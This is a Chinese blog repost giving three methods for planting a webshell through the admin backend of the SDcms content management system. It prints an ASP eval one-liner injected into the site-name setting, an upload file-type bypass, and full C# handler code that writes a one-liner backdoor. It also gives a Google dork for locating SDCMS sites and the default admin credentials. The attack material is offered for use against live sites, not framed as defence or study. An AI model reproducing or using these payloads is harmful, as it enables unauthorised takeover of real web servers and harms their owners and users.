SDcms后台拿webshell

最新推荐文章于 2023-12-25 21:18:57 发布
最新推荐文章于 2023-12-25 21:18:57 发布
阅读量4.7k 收藏
点赞数
分类专栏: 漏洞收集 文章标签: file class asp c# 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6587032
版权

第一种方法


进入后台-->系统管理-->系统设置-->系统设置->网站名称;
把网站名称内容修改为   "%><%eval request("80lr")'    //密码为80lr
用菜刀链接http://www.80lr.com/inc/const.asp  就搞定了。


第二种方法


进入后台-->系统管理-->系统设置-->系统设置->上传设置;
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!


第三种方法


进入后台-->界面管理-->模板文件管理-->创建文件
文件名写入getshell.ashx
内容写入下面内容:
/====================复制下面的=========================/
<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
file1.Write("<%response.clear:execute request(\"80lr\"):response.End%>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {
return false;
}
}
}
/=============================================/
访问这个地址:http://www.80lr.com/skins/2009/getshell.ashx 
会在http://www.80lr.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为80lr 用菜刀链接



送上关键词:intitle:"Powered By SDCMS"
后台http://www.80lr.com/admin/   默认用户和密码:sdcms
本文来自易寒网络,转载务必注明原文链接:http://www.80lr.com/oday/241.html

7禧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sdcms_php_web,SDCMS通杀漏洞
weixin_28787801的博客
04-07 1196
作者:T00LS 鬼哥漏洞文件:后台目录/index.asp作者声明:转载请注明 T00ls 鬼哥Sub CheckDim username,password,code,getcode,RsIF Check_post Then Echo "1禁止从外部提交数据!":Exit Subusername=FilterText(Trim(Request.Form("username")),1)passwo...
sdcms3.3门户版asp程序完整版.zip
09-04
后台地址:/admin 账户:admin 密码:fcuwqvcgri ,价值499元的sdcms3.3门户版程序
45种可以拿到Webshell的程序
jahn的专栏
10-26 8673
   到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!---我看了下..真的很多...可以用这个..asp?="pig" 呵呵`~2,到Google ,site:cq.cn inurl:asp3,利用挖掘鸡和一个ASP木马.文件名是login.asp路径组是/manage/关键词是went.asp用or=or来登陆4,关键字:Co Net
SDCMS靶场漏洞挖掘
最新发布
huohaowen的博客
12-25 1851
本篇blog主要是sdcms靶场的漏洞挖掘
靶场练习——SDcms文件上传漏洞靶场
p36273的博客
09-15 1208
今次练习的是SDcms靶场,该靶场是一个文件上传漏洞系列的靶场,靶场如下: 如图所示,登录页面参数是?m=login尝试把上面URL的参数login改成admin,如下图,进入成功。 这里第一反应使用了账号密码爆破,发现对访问的IP有限制,一旦超过错误访问次数,就会被限制登录,图片如下: 使用账号密码admin/admin,成登录网站后台 找到如图所示的文件上传点 如图找到文件上传的路径:/upfile/2023/09/在Burp中把 .jpg 改成 .php,然后再文件内容中添加GIF89a头部,发现ph
SDCMS 1.1sp1的XSS漏洞的挖掘与利用
weixin_33759269的博客
05-18 408
本文已发《黑客防线》第六期(转载请注明) SDCMS全称:时代网站信息管理系统。SDCMS是基于ASP+ACCESS/MSSQL的网站信息管理系统。永久免费,开源! SDCMS以信息为主题,通过以文字和图片标题为起点,以无限栏目分类为支撑,配合多项插件的灵活使用,以达到信息门户的远景! SDCMS总结各类信息门户的现状,充分考虑符合站长需求的前提下。设计了灵活多变的标签调用方式,满足了不同层次...
sdcms3.1.zip
04-05
SDCMS3.1作为其第三个主要版本,带来了许多优化和改进,旨在提升用户体验和管理效率。 在SDCMS3.1中,我们可以看到以下关键知识点: 1. **模块化设计**:SDCMS3.1采用了模块化的结构,允许用户根据需求安装和卸载...
SDCMS四网合一企业网站管理系统-PHP
06-20
SDCMS四网合一企业网站管理系统是一个以PHP+MySQL/Sqlite进行开发的四网合一网站源码。 四网合一: 电脑网站、手机站(数据同步、支持绑定域名)、小程序、公众号管理一个后台即可搞定。 双数据库引擎、运行环境全面...
sdcms系统源码 1.0
03-25
登录后台:/admin 管理员及密码为:sdcms 第一使用请先登录后台生成网站网页后才能正常浏览前台。 修正的功能 1.修正了广告插件、投票插件删除信息会出错的问题 2.修正了图片列表标签,文字标题不为0时会出错的问题 3...
SDcms.zip_sdcms_sdcms asp_sdcms asp_sqlserver_商城
09-24
SDcmsASP+SQLServer构建的开源商城系统解析》 SDcms是一款基于ASP编程语言和SQLServer数据库的开源商城系统,它为电子商务网站的建设和二次开发提供了强大的平台。这款软件以其灵活、可扩展的特性,深受开发者...
sdcms2.0文章采集插件
03-10
找了好久,才找到的sdcms可用的采集插件
sdcms asp采集插件 2.0版本以上可用
09-12
sdcms采集插件2.0版本以上可以用 文章采集插件 sdcms采集插件2.0版本以上可以用 文章采集插件
sdcms数据库备份插件3.0
05-16
sdcms时代网站信息管理系统门户版3.0以上,企业版2.0以上的版本使用
sdcms时代网站信息管理系统 v2.2 企业版
12-07
SDCMS企业版主要包含:文章、单图、商品、招聘、下载、单页、外链、定时发布、手机版、自定义字段、自定义表单等模块,系统内置评论,留言,心情,搜索,标签,7年企业网站建设经验为您精心打造,是您快速建立中小营销型企业网站的良好选择。 时代网站信息管
时代网站信息管理系统SDCMS源代码
03-18
时代网站信息管理系统SDCMS是一个以asp+access进行开发的门户网站系统。 SDCMS门户版主要包含:文章、组图、视频、下载、单页、外链等模块,系统内置会员模型:会员组,VIP会员,积分购买,会员投稿,投票,评论,留言,心情,搜索,标签,头像组件,在线充值
SDCMS.rar_sdcms_sdcms asp版_sdcms spider.asp_sdcms模板
09-24
SDCMS(网站信息管理系统)是在Asp+Access/Mssql环境下开发的开源产品。SDCMS以信息为主题,通过以文字和图片标题为起点,以无限栏目分类为支撑,配合多项插件的灵活使用,以达到信息门户的远景!  SDCMS设计了全新...
SDcms1.8代码审计
weixin_30480583的博客
06-12 211
由于工作原因,分析了很多的cms也都写过文章,不过觉得好像没什么骚操作都是网上的基本操作,所以也就没发表在网站上,都保存在本地。最近突然发现自己博客中实战的东西太少了,决定将以前写的一些文章搬过来,由于当时写的初愿是给自己留个记录,以后方便查看,所以写的都很简单,只有代码审计和复现,没有详细写挖掘中遇到的一些坑。以后写的文章中会尽量写详细的 ---------------------------...
sdcms代码审计之sql注入
willow_liang的博客
10-30 1752
1.漏洞注入点分析(黑名单 ) 2.注入payload构造(双参数构造,sqlmap绕过) 注册账号后发现网站有在线留言功能,可以查看能否注入 查看F函数 #F函数(get和post) function F($a,$b='') { $a=strtolower($a); if(!strpos($a,'.')) { $method='other'; } else { list($method,$a)=explode('.',$a,2); } switch ($method) {
验证码绕过、密码找回漏洞简介
seek_2022的博客
06-05 1574
本文首先介绍验证码绕过的常见姿势及密码找回漏洞,通过本地搭建cms进行测试,确定漏洞的利用方法,并在相应的靶场上进行漏洞复现,演示了验证码漏洞的利用过程
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值